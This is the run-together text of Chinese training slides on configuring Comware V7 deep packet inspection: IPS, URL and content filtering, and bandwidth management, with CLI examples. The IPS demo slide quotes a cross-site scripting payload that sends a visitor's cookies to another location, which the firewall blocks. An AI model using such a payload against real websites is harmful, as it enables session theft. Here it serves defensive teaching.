深度報文檢測技術Comware V7 DPI

深度報文檢測技術ComwareV7DPI了解DPI特性基本原理掌握DPI特性配置方法熟悉DPI特性應用場景了解DPI特性基本維護學習完本課程，您應該能夠：21.DPI基本工作原理2.DPI功能及相應配置方法3.DPI典型組網(wǎng)應用4.DPI基本維護目錄3DPI深度安全的需求背景DPI（DeepPacketInspection，深度報文檢測）深度安全是一種基于應用層信息對流經(jīng)設備的網(wǎng)絡流量進行檢測和控制的安全機制業(yè)務識別：指對報文傳輸層以上的內容進行分析，由應用層檢測引擎模塊來完成，是實現(xiàn)DPI深度安全功能的核心和基礎。業(yè)務識別的結果為DPI各業(yè)務模塊對報文的處理提供判斷依據(jù)業(yè)務控制：系統(tǒng)根據(jù)各DPI業(yè)務模塊策略及規(guī)則配置，實現(xiàn)對業(yè)務流量的靈活控制，包括：放行、丟棄、源阻斷、重置、捕獲和生成日志業(yè)務統(tǒng)計：指對業(yè)務流量的類型、協(xié)議解析結果、特征報文檢測和處理結果等進行統(tǒng)計。統(tǒng)計結果可直觀體現(xiàn)業(yè)務流量分布和使用情況，為網(wǎng)絡可視化運維和業(yè)務持續(xù)優(yōu)化提供依據(jù)4DPI基本工作原理5預定義特征庫自定義特征配置規(guī)則V7域間策略原始數(shù)據(jù)流純凈數(shù)據(jù)流特征下發(fā)規(guī)則下發(fā)IPS特征庫APR特征庫URL分類特征庫自定義IPS規(guī)則自定義URL規(guī)則DPI簡易報文處理流程6DPI與V7域間策略的關系71.DPI基本工作原理2.DPI功能及相應配置方法3.DPI典型組網(wǎng)應用4.DPI基本維護8目錄DPI為ComwareV7提供的特性APR 應用識別IPS 入侵防御UFLT URL過濾DFLT 內容過濾AVC 帶寬管理AV 病毒防護9應用識別APR基于端口的應用層協(xié)議識別PBAR通用端口映射主機端口映射基于內容特征的應用層協(xié)議識別NBAR預定義特征庫自定義特征（TCP、UDP、HTTP）基于流特征的應用識別10APR特征庫支持1000多種主流應用特征支持在線服務器升級及周期自動升級支持本地離線升級支持特征庫回滾與恢復出廠狀態(tài)升級特征庫需License授權11應用12IPS入侵防御系統(tǒng)深度防護：可以檢測報文應用層內容，以及對網(wǎng)絡數(shù)據(jù)流進行協(xié)議分析和重組，并根據(jù)檢測結果來對報文做出相應的處理實時防護：實時檢測流經(jīng)設備的網(wǎng)絡流量，并對入侵活動和攻擊網(wǎng)絡流量進行實時攔截全方位防護：可以對多種攻擊類型提供防護措施，例如蠕蟲、病毒、木馬、僵尸網(wǎng)絡、間諜軟件、廣告軟件、跨站腳本攻擊、注入攻擊、目錄遍歷、信息泄露、遠程文件保護攻擊、溢出攻擊、代碼執(zhí)行、拒絕服務、掃描攻擊、后門等等內外兼防：對經(jīng)過設備的流量都可以進行檢測，不僅可以防止來自企業(yè)外部的攻擊，還可以防止發(fā)自企業(yè)內部的攻擊13IPS特征庫預定義特征支持2w+的特征周期發(fā)布、自動周期在線更新手工立即在線更新或離線更新特征庫回滾或恢復出廠設置升級需License授權自定義特征需遵循Snort語法僅支持以文件導入方式形成自定義IPS特征14IPS動作IPS動作指設備對匹配IPS特征的報文可執(zhí)行的操作，IPS處理動作包括如下幾種類型重置：通過發(fā)送TCP的reset報文或UDP的ICMP端口不可達報文斷開TCP或UDP連接源阻斷：阻斷符合特征的報文。如果設備上同時開啟了黑名單過濾功能，則將該報文的源IP地址加入黑名單，再次收到來自此IP地址的報文時直接丟棄丟棄：丟棄符合特征的報文放行：允許符合特征的報文通過捕獲：捕獲符合特征的報文生成日志：對符合特征的報文生成日志信息15IPS策略策略整體流程如果報文與黑名單匹配成功，則直接丟棄該報文如果報文匹配了某對象策略規(guī)則，且此對象策略規(guī)則的動作是inspect，則設備將對報文進行深度內容檢測：首先，識別報文的協(xié)議，然后根據(jù)協(xié)議分析方案進行更精細的分析，并深入提取報文特征設備將提取的報文特征與IPS特征進行匹配，并對匹配成功的報文進行如下處理如果報文同時與多個IPS特征匹配成功，則根據(jù)這些動作中優(yōu)先級最高的動作進行處理。動作優(yōu)先級從高到低的順序為：reset->(block-source/drop)->permit，其中block-source與drop的優(yōu)先級相同如果報文只與一個IPS特征匹配成功，則根據(jù)此特征中指定的動作進行處理如果報文未與任何IPS特征匹配成功，則設備直接允許報文通過16IPS策略典型組網(wǎng)如圖所示，Device分別通過Trust安全域和Untrust安全域與局域網(wǎng)和Internet相連?，F(xiàn)要求使用設備上的缺省IPS策略對常見的網(wǎng)絡攻擊進行防御17IPS策略典型配置配置各接口的IP地址（略）配置IPS功能創(chuàng)建名為sec的DPI應用profile，并進入該DPI應用profile視圖[Device]app-profilesec在DPI應用profilesec中應用缺省IPS策略default，并指定該IPS策略的模式為Protect[Device-app-profile-sec]ipsapplypolicydefaultmodeprotect配置對象策略配置安全域向安全域Trust中添加接口GigabitEthernet1/0/1[Device]security-zonenametrust[Device-security-zone-Trust]importinterfacegigabitethernet1/0/1向安全域Untrust中添加接口GigabitEthernet1/0/2[Device]security-zonenameuntrust[Device-security-zone-Untrust]importinterfacegigabitethernet1/0/218IPS策略典型配置（續(xù)）配置對象創(chuàng)建名為ipsfilter的IP地址對象組，并定義其子網(wǎng)地址為/24[Device]object-groupipaddressipsfilter[Device-obj-grp-ip-ipsfilter]networksubnet24配置對象策略及規(guī)則創(chuàng)建名為ipsfilter的IPv4對象策略，并進入該對象策略視圖[Device]object-policyipipsfilter對源IP地址對象組ipsfilter對應的報文進行深度檢測，引用的DPI應用profile為sec。[Device-object-policy-ip-ipsfilter]ruleinspectsecsource-ipipsfilterdestination-ipany配置安全域間實例并應用對象策略創(chuàng)建源安全域Trust到目的安全域Untrust的安全域間實例，并應用對源IP地址對象組ipsfilter對應的報文進行深度檢測的對象策略ipsfilter[Device]zone-pairsecuritysourcetrustdestinationuntrust[Device-zone-pair-security-Trust-Untrust]object-policyapplyipipsfilter19IPS策略舉例20攻擊者HTTP服務器PC構造CSS攻擊，訪問http服務器，通過瀏覽器訪問8:8080/?detail=<script>document.location.replace('0'+document.cookie);</script>檢測到攻擊阻斷并記錄日志威脅日志列表21威脅報表22UFLTURL過濾原理URL過濾功能是指對用戶訪問的URL進行控制，即允許或禁止用戶訪問的Web資源，達到規(guī)范用戶上網(wǎng)行為的目的目前僅支持基于HTTP協(xié)議的URL過濾通過使用URL過濾規(guī)則匹配URL中的host字段和URI字段23URL過濾規(guī)則URL過濾規(guī)則是指對用戶HTTP報文中的URL進行匹配的原則，且其分為兩種規(guī)則預定義規(guī)則：根據(jù)設備中的URL過濾特征庫自動生成，包括百萬級的HOST或URI。預定義規(guī)則能滿足多數(shù)情況下的URL過濾需求自定義規(guī)則：由管理員手動配置生成，可以通過使用正則表達式或者文本的方式來配置規(guī)則中HOST或URI的內容URL過濾規(guī)則支持兩種匹配方式文本匹配：使用指定的字符串對HOST和URI字段進行精確匹配正則表達式匹配：使用正則表達式對HOST和URI字段進行模糊匹配。例如，規(guī)則中配置HOST的正則表達式為sina.*cn，則HOST為的URL會匹配成功24URL分類與URL策略為便于管理員對數(shù)目眾多的URL過濾規(guī)則進行統(tǒng)一部署，URL過濾模塊提供了URL過濾分類功能，以便對具有相似特征的URL過濾規(guī)則進行歸納以及為匹配這些規(guī)則的URL統(tǒng)一指定處理動作每個URL過濾分類具有一個嚴重級別屬性，即此過濾分類的處理優(yōu)先級預定義分類：根據(jù)設備中的URL過濾特征庫自動生成，僅可以修改其嚴重級別自定義分類：由管理員手動配置，可修改其嚴重級別，可添加URL過濾規(guī)則URL過濾策略是用于關聯(lián)所有URL過濾配置的一個實體策略中可以配置URL過濾分類和處理動作的綁定關系策略中可以配置缺省動作（即對未匹配上任何URL過濾規(guī)則的報文采取的動作）支持的處理動作包括，丟棄、放行、阻斷、重置和生成日志25URL過濾策略策略整體流程如果報文匹配了某對象策略規(guī)則，且此對象策略規(guī)則的動作是inspect，則設備提取報文中的URL字段進行過濾規(guī)則匹配報文成功匹配URL過濾規(guī)則后，設備將進一步判斷該規(guī)則是否同時屬于多個URL過濾分類如果此URL過濾規(guī)則同時屬于多個URL過濾分類，則根據(jù)嚴重級別最高的URL過濾分類的動作對此報文進行處理如果此URL過濾規(guī)則只屬于一個URL過濾分類，則根據(jù)該規(guī)則所屬的URL過濾分類的動作對此報文進行處理如果報文未匹配上任何一條URL過濾規(guī)則。設備將進一步判斷URL過濾策略中是否存在URL過濾缺省動作，并根據(jù)缺省動作對此報文進行處理否則直接允許報文通過26URL過濾策略典型組網(wǎng)如圖所示，Device分別通過Trust安全域和Untrust安全域與局域網(wǎng)和Internet相連?，F(xiàn)有組網(wǎng)需求如下允許Trust安全域的主機訪問Untrust安全域的WebServer上的配置預定義URL過濾分類Pre-Games的動作為丟棄并生成日志配置URL過濾策略缺省動作為丟棄和生成日志27URL過濾策略典型配置配置各接口的IP地址（略）配置URL過濾功能創(chuàng)建名news的URL過濾分類并進入相應視圖，設置該分類的級別值為2000[Device]url-filtercategorynewsseverity2000在URL過濾分類news中添加一條規(guī)則，使用字符串對host字段進行精確匹配[Device-url-filter-category-news]rule1hosttext創(chuàng)建名為urlnews的URL過濾策略，并進入該URL過濾策略視圖[Device]url-filterpolicyurlnews在URL過濾策略urlnews中，配置URL過濾分類news綁定的動作為允許[Device-url-filter-policy-urlnews]categorynewsactionpermit在URL過濾策略urlnews中，配置預定義URL過濾分類Pre-Games綁定的動作為丟棄并生成日志[Device-url-filter-policy-urlnews]categoryPre-Gamesactiondroplogging28URL過濾策略典型配置（續(xù)）在URL過濾策略urlnews中，配置策略的缺省動作為丟棄和告警[Device-url-filter-policy-urlnews]default-actionactiondroplogging創(chuàng)建名為sec的DPI應用profile，并進入該DPI應用profile視圖[Device]app-profilesec在DPI應用profilesec中應用URL過濾策略urlnews[Device-app-profile-sec]url-filterapplyurlnews執(zhí)行inspectactivate命令使得以上與URL過濾策略相關的配置生效[Device]inspectactivate配置安全域向安全域Trust中添加接口GigabitEthernet1/0/1[Device]security-zonenametrust[Device-security-zone-Trust]importinterfacegigabitethernet1/0/1向安全域Untrust中添加接口GigabitEthernet1/0/2[Device]security-zonenameuntrust[Device-security-zone-Untrust]importinterfacegigabitethernet1/0/229URL過濾策略典型配置（續(xù)）配置對象創(chuàng)建名為urlfilter的IP地址對象組，并定義其子網(wǎng)地址為/24[Device]object-groupipaddressurlfilter[Device-obj-grp-ip-urlfilter]networksubnet24配置對象策略及規(guī)則創(chuàng)建名為urlfilter的IPv4對象策略，并進入該對象策略視圖[Device]object-policyipurlfilter對源IP地址對象組urlfilter對應的報文進行深度檢測，引用的DPI應用profile為sec[Device-object-policy-ip-urlfilter]ruleinspectsecsource-ipurlfilterdestination-ipany配置安全域間實例并應用對象策略創(chuàng)建源安全域Trust到目的安全域Untrust的安全域間實例，并應用對源IP地址對象組urlfilter對應的報文進行深度檢測的對象策略urlfilter[Device]zone-pairsecuritysourcetrustdestinationuntrust[Device-zone-pair-security-Trust-Untrust]object-policyapplyipurlfilter30URL過濾策略舉例31攻擊PCPC訪問符合安全策略的網(wǎng)站檢測到非合規(guī)訪問阻斷并記錄日志URL日志列表32URL報表33DFLT內容過濾內容過濾是一種對通過設備的應用層協(xié)議報文內容進行過濾的安全機制采用內容過濾功能可以阻止內部網(wǎng)絡用戶訪問非法網(wǎng)站，并阻止含有非法內容的報文進入內部網(wǎng)絡目前該功能僅支持HTTP協(xié)議34HTTP協(xié)議內容過濾功能原理Method過濾設備收到HTTP請求報文后，對其中的請求Method字段進行過濾，阻止用戶某些請求行為URI（UniformResourceIdentifier，統(tǒng)一資源標識符）過濾設備收到HTTP請求報文后，對請求URI中的內容進行過濾，阻止用戶訪問某些特定的網(wǎng)站或阻止URI中非法內容；同時支持對URI字段的長度進行過濾Header過濾服務器發(fā)往客戶端的HTTP響應報文中的Header字段一般包含當前網(wǎng)頁的類型（如文本、圖片等）、HTTP內容長度、服務器基本信息（如服務器類型、響應時間等）等信息，使用Header過濾可以阻止Header字段中含有特定信息的HTTP響應報文通過設備；同時，也支持對HTTP請求報文中Header字段進行過濾Body過濾使用Body過濾可以對服務器發(fā)往客戶端的HTTP報文中攜帶的最終可視內容（即用戶在瀏覽器上看到的實際內容）進行過濾，阻止含有特定可視內容的報文通過設備，以防止非法內容在內部網(wǎng)絡中傳播；同時，也支持對HTTP請求報文的Body字段進行過濾狀態(tài)行過濾使用狀態(tài)行過濾可以阻止狀態(tài)行字段中含有特定信息的HTTP響應報文通過設備35內容過濾策略典型組網(wǎng)如圖所示，Device分別通過Trust安全域和Untrust安全域與局域網(wǎng)和Internet相連?，F(xiàn)有以下組網(wǎng)需求阻止子頭域中含有“abc”關鍵字的HTTP請求報文通過阻止Method字段含有GET關鍵字的HTTP請求報文通過阻止URI字段含有“uri”關鍵字的HTTP請求報文通過阻止Body字段含有“abc.*abc”關鍵字的HTTP響應報文通過對以上被阻止的報文生成日志信息36內容過濾策略典型配置配置各接口的IP地址（略）配置正則表達式集創(chuàng)建正則表達式集regex0，并進入正則表達式集視圖[Device]content-filteringregexregex0配置匹配關鍵字abc。[Device-cflt-regex-regex0]patterntextabc創(chuàng)建正則表達式集regex1，并進入正則表達式集視圖[Device]content-filteringregexregex1配置匹配關鍵字uri。[Device-cflt-regex-regex1]patterntexturi創(chuàng)建正則表達式集regex2，并進入正則表達式集視圖[Device]content-filteringregexregex2配置正則表達式abc.*abc[Device-cflt-regex-regex2]patternregexabc.*abc37內容過濾策略典型配置（續(xù)）配置內容過濾規(guī)則類創(chuàng)建HTTP協(xié)議類型的內容過濾規(guī)則類class1，并進入過濾規(guī)則類視圖[Device]content-filteringclassclass1httpmatch-any配置規(guī)則1，指定HTTP請求報文的Method字段包含GET[Device-cflt-class-class1]match1requestmethodget配置規(guī)則2，指定匹配HTTP請求報文頭中所有子頭域正則表達式集為regex0[Device-cflt-class-class1]match2requestheaderregexregex1配置規(guī)則3，指定匹配HTTP請求報文中URI內容的正則表達式集為regex1[Device-cflt-class-class1]match3requesturiregexregex1配置規(guī)則4，指定匹配HTTP響應報文中Body字段的正則表達式集為regex2[Device-cflt-class-class1]match4responsebodyregexregex238內容過濾策略典型配置（續(xù)）配置內容過濾策略創(chuàng)建內容過濾策略policy1，匹配模式為match-all，并進入內容過濾策略視圖[Device]content-filteringpolicypolicy1match-all配置內容過濾規(guī)則類class1和動作reset、logging的綁定關系[Device-cflt-policy-policy1]classclass1actionresetlogging配置DPI應用profile創(chuàng)建名稱為profile1的DPI應用profile，并進入DPI應用profile視圖[Device]app-profileprofile1在DPI應用profile中引用內容過濾策略policy1[Device-app-profile-profile1]content-filteringapplypolicypolicy1執(zhí)行inspectactivate命令使得以上與內容過濾策略相關的配置生效[Device]inspectactivate39內容過濾策略典型配置（續(xù)）配置安全域向安全域Trust中添加接口GigabitEthernet1/0/2[Device]security-zonenametrust[Device-security-zone-Trust]importinterfacegigabitethernet1/0/2向安全域Untrust中添加接口GigabitEthernet1/0/1[Device]security-zonenameuntrust[Device-security-zone-Untrust]importinterfacegigabitethernet1/0/1配置對象策略創(chuàng)建名為inspect1的對象策略。[Device]object-policyipinspect1配置對象策略規(guī)則0引用DPI應用profileprofile1[Device-object-policy-ip-inspect1]rule0inspectprofile1配置安全域間實例創(chuàng)建源域Trust到目的域Untrust的安全域間實例，并應用對象策略inspect1[Device]zone-pairsecuritysourcetrustdestinationuntrust[Device-zone-pair-security-Trust-Untrust]object-policyapplyipinspect140AVC帶寬管理帶寬管理是指對通過設備的流量實現(xiàn)基于源/目的安全域、源/目的IP地址、用戶、應用等，進行精細化的管理和控制理帶寬管理的典型應用場景如下企業(yè)內網(wǎng)用戶所需的帶寬遠大于從運營商租用的出口帶寬，這時網(wǎng)絡出口就會存在帶寬瓶頸的問題網(wǎng)絡出口中P2P業(yè)務類型的數(shù)據(jù)流量消耗了絕大部分的帶寬資源，致使企業(yè)的關鍵業(yè)務得不到帶寬保證為了解決以上問題，可以在網(wǎng)絡出口設備上部署帶寬管理，針對不同的內網(wǎng)業(yè)務流量應用不同的帶寬策略規(guī)則，實現(xiàn)合理分配出口帶寬和保證關鍵業(yè)務正常運行的目的41帶寬管理功能原理流量匹配上帶寬策略中的某條規(guī)則后，設備將根據(jù)此規(guī)則中指定的動作來對該流量進行控制。如果動作是限流（qosprofileprofile-name），則流量繼續(xù)進入相應的帶寬通道進行后續(xù)的處理；如果動作是拒絕（deny），則拒絕此流量通過；如果規(guī)則中沒有配置動作，則直接允許該流量通過流量進入帶寬通道后，設備會根據(jù)此帶寬通道中的配置，對流量進行相應的處理。目前帶寬通道中可配置保證最小帶寬和限制最大帶寬42帶寬策略與規(guī)則帶寬策略中可以配置多個帶寬策略規(guī)則，這些規(guī)則用于定義匹配流量的匹配項以及流量控制的動作不同規(guī)則之間的匹配順序為：按規(guī)則配置的先后順序對流量進行匹配，一旦流量匹配某條規(guī)則便結束全部匹配過程，并根據(jù)該規(guī)則中指定的動作對此流量進行處理如果流量沒有匹配任何規(guī)則，則允許該流量通過一個帶寬策略規(guī)則中可以配置多種類型的匹配項匹配項包括：源/目的安全域、源/目的IP地址、用戶/用戶組、應用/應用組、時間段每類匹配項支持配置多個條件43帶寬策略與規(guī)則（續(xù)）判斷流量是否被帶寬策略規(guī)則匹配的方式有兩種只有規(guī)則中配置的所有匹配項均被匹配，才認為匹配成功只要規(guī)則中配置的任意一個匹配項被匹配，即認為匹配成功帶寬策略規(guī)則支持嵌套關系，即一個規(guī)則中可以指定一個父規(guī)則。流量進行匹配時，遵守如下原則首先匹配父規(guī)則，若父規(guī)則匹配失敗，不再進行關聯(lián)子規(guī)則匹配父規(guī)則匹配成功后，再進行關聯(lián)子規(guī)則匹配若子規(guī)則匹配成功，則執(zhí)行子規(guī)則中指定的動作若子規(guī)則匹配失敗，則仍執(zhí)行父規(guī)則中指定的動作44帶寬通道帶寬通道定義了具體的帶寬資源，是執(zhí)行帶寬管理的基礎可將物理的帶寬資源從邏輯上劃分為多個虛擬的帶寬通道，每個帶寬通道中均可自定義相應的帶寬資源限制參數(shù)目前支持的帶寬資源限制參數(shù)包括以下兩類保證帶寬：是指保證業(yè)務的最小帶寬，在線路擁堵時，可以保證公司關鍵業(yè)務所需的帶寬，確保此類業(yè)務不受影響最大帶寬：是指限制業(yè)務的最大帶寬，比如限制網(wǎng)絡中非關鍵業(yè)務占用的帶寬資源，避免該類業(yè)務消耗大量的帶寬，影響其他關鍵業(yè)務的正常運行45帶寬管理策略典型組網(wǎng)主機A和主機B通過Device與外網(wǎng)相連，通過在Device上配置基于應用的帶寬管理功能，實現(xiàn)當內網(wǎng)流量的出口發(fā)生擁塞時優(yōu)先保證FTP業(yè)務的需求。具體要求如下限制內網(wǎng)用戶，訪問外網(wǎng)P2P應用流量的上行最大帶寬和下行最大帶寬均為30720kbit/s。保證內網(wǎng)用戶，訪問外網(wǎng)FTP應用的流量的上行保證帶寬和下行保證帶寬均為30720kbit/s限制外網(wǎng)出接口的最大帶寬為30720kbit/s46帶寬管理策略典型配置配置各接口的IP地址（略）配置帶寬通道創(chuàng)建名為profileP2P的帶寬通道，并進入該帶寬通道視圖。[Device]traffic-policy[Device-traffic-policy]profilenameprofileP2P配置上/下行最大帶寬均為30720kbit/s。[Device-traffic-policy-profile-profileP2P]bandwidthupstreammaximum30720[Device-traffic-policy-profile-profileP2P]bandwidthdownstreammaximum30720創(chuàng)建名為profileFTP的帶寬通道，并進入該帶寬通道視圖。[Device-traffic-policy]profilenameprofileFTP配置上/下行保證帶寬均為30720kbit/s。[Device-traffic-policy-profile-profileFTP]bandwidthupstreamguaranteed30720[Device-traffic-policy-profile-profileFTP]bandwidthdownstreamguaranteed3072047帶寬管理策略典型配置（續(xù)）配置出接口的期望帶寬配置接口GigabitEthernet1/0/1的期望帶寬為30720kbit/s[Device]interfacegigabitethernet1/0/1[Device-GigabitEthernet1/0/1]bandwidth30720[Device-GigabitEthernet1/0/1]quit配置帶寬策略規(guī)則進入帶寬策略視圖[Device]traffic-policy創(chuàng)建名為ruleP2P的帶寬策略規(guī)則，并進入該帶寬策略規(guī)則視圖[Device-traffic-policy]rulenameruleP2P在帶寬策略規(guī)則ruleP2P中引用自定義的應用P2P[Device-traffic-policy-rule-ruleP2P]applicationappp2p48帶寬管理策略典型配置（續(xù)）配置帶寬策略規(guī)則ruleP2P中的動作為限流并應用帶寬通道profileP2P[Device-traffic-policy-rule-ruleP2P]actionqosprofileprofileP2P創(chuàng)建名為ruleFTP的帶寬策略規(guī)則，并進入該帶寬策略規(guī)則視圖[Device-traffic-policy]rulenameruleFTP配置帶寬策略規(guī)則ruleFTP中引用預定義的應用ftp[Device-traffic-policy-rule-ruleFTP]applicationappftp配置帶寬策略規(guī)則ruleFTP中的動作為限流并應用帶寬通道profileFTP[Device-traffic-policy-rule-ruleFTP]actionqosprofileprofileFTP49DPI特性配置方法總則501.DPI基本工作原理2.DPI功能及相應配置方法3.DPI典型組網(wǎng)應用4.DPI基本維護51目錄DPI典型組網(wǎng)在各類數(shù)據(jù)中心/園區(qū)網(wǎng)，為實現(xiàn)對內網(wǎng)用戶上網(wǎng)行為進行監(jiān)控審計，并對一些占用帶寬比較嚴重的應用進行限速，可在出口處部署支持DPI特性的設備52F5020日志分析服務器某企業(yè)園區(qū)網(wǎng)聯(lián)動認證日志收集豐富報表EIA/Radius/AAA認證服務器1.DPI基本工作原理2.DPI功能及相應配置方法3.DPI典型組網(wǎng)應用4.DPI基本維護53目錄查看DPI檢測狀態(tài)54displayinspectstatus字段釋義Runningstatus應用層檢測引擎的運行狀態(tài)，包括如下取值：bypassbyconfigure：因為配置原因引擎無法處理報文bypassbycpubusy：因為CPU使用率過高導致引擎無法處理報文bypassbymemoryshortage：因為內存不足導致引擎無法處理報文normal：引擎工作正常應用層檢測引擎規(guī)則命中統(tǒng)計信息Slot1:RuleID ModuleRulehitsAChitsPCREtryPCREhits1 IPS 030 0 03 IPS 01 1 0268435460 UFLT 295955295955 0 0273678345 UFLT 419419 0 0268435465 UFLT 419419 0 011 IPS 09 21 015 IPS 11 1 116 IPS 02 2 055displayinspecthit-statistics字段釋義RuleID檢測規(guī)則IDModule檢測規(guī)則所屬的DPI業(yè)務的名稱RuleHit檢測規(guī)則被命中次數(shù)ACHitAC關鍵字被命中的次數(shù)PCRETry正則表達式嘗試匹配的次數(shù)PCREHit正則表達式被命中的次數(shù)應用層檢測引擎HTTP協(xié)議統(tǒng)計信息Slot1:NewCtxNewCtxErrDelCtxReqTsRspTsReqSecTsRspSecTsReqErrTsRspErrTs90 999100056displayinspecthttp字段釋義NewCtx申請資源的次數(shù)，應用層檢測引擎為記錄HTTP報文解析結果，需要申請資源NewCtxErr申請資源失敗的次數(shù)，內存不足會導致申請資源失敗DelCtx應